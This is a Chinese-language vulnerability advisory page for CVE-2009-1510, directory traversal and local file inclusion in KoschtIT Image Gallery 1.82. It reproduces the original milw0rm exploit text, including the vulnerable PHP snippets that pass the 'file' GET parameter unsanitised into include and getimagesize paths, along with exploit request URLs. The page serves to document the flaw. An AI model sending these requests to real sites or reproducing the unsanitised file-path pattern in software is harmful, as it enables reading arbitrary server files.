KoschtIT Image Gallery 'ki_makepic.php和ki_nojsdisplayimage.php' 文件目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117546 漏洞类型 路径遍历
发布时间 2009-04-01 更新时间 2009-05-04
CVE编号 CVE-2009-1510 CNNVD-ID CNNVD-200905-031
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8334
https://cxsecurity.com/issue/WLB-2009050100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-031
|漏洞详情
KoschtITImageGallery1.82版本中存在多个目录遍历漏洞。远程攻击者可以借助对(1)ki_makepic.php和(2)ki_base/的ki_nojsdisplayimage.php的文件参数中的目录遍历序列,包含和允许任意本地文件。
|漏洞EXP
:local file include:
   
#############################
script: koschtit_image_gallery(v1.82)
   
##############################################################
download from:http://koschtit..tabere.net/download/
or http://koschtit.tabere.net/en/#getit 
   
##############################################################
vul:/ki_base/ki_makepic.php


if(isset($_GET['file'])) 
 $file = "../ki_galleries/".$_GET['file'];
else
 exit();

$gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/"));
if(is_file("../ki_config/".$gallery."_ki_setup.php"))
 include_once("../ki_config/".$gallery."_ki_setup.php");

$imgsize = getimagesize($file); 

#############
vul:/ki_base/ki_nojsdisplayimage.php

$gallery = substr($_GET['file'], 0, strpos($_GET['file'], "/"));

include_once("../ki_config/ki_setup.php");
if(is_file(".../ki_config/".$gallery."_ki_setup.php")){
 include_once("../ki_config/".$gallery."_ki_setup.php");
}
.
.
$srcfile = "../ki_galleries/".$file;
$imgsize = getimagesize("../ki_galleries/".$file);

##############################################################
xpl:
path/ki_base/ki_makepic.php?file=[local_file]
path/ki_base/ki_nojsdisplayimage.php?file=[local_file]  
------------------------------------------------------------

# milw0rm.com [2009-04-01]
|参考资料

来源:BID
名称:34335
链接:http://www.securityfocus.com/bid/34335
来源:MILW0RM
名称:8334
链接:http://www.milw0rm.com/exploits/8334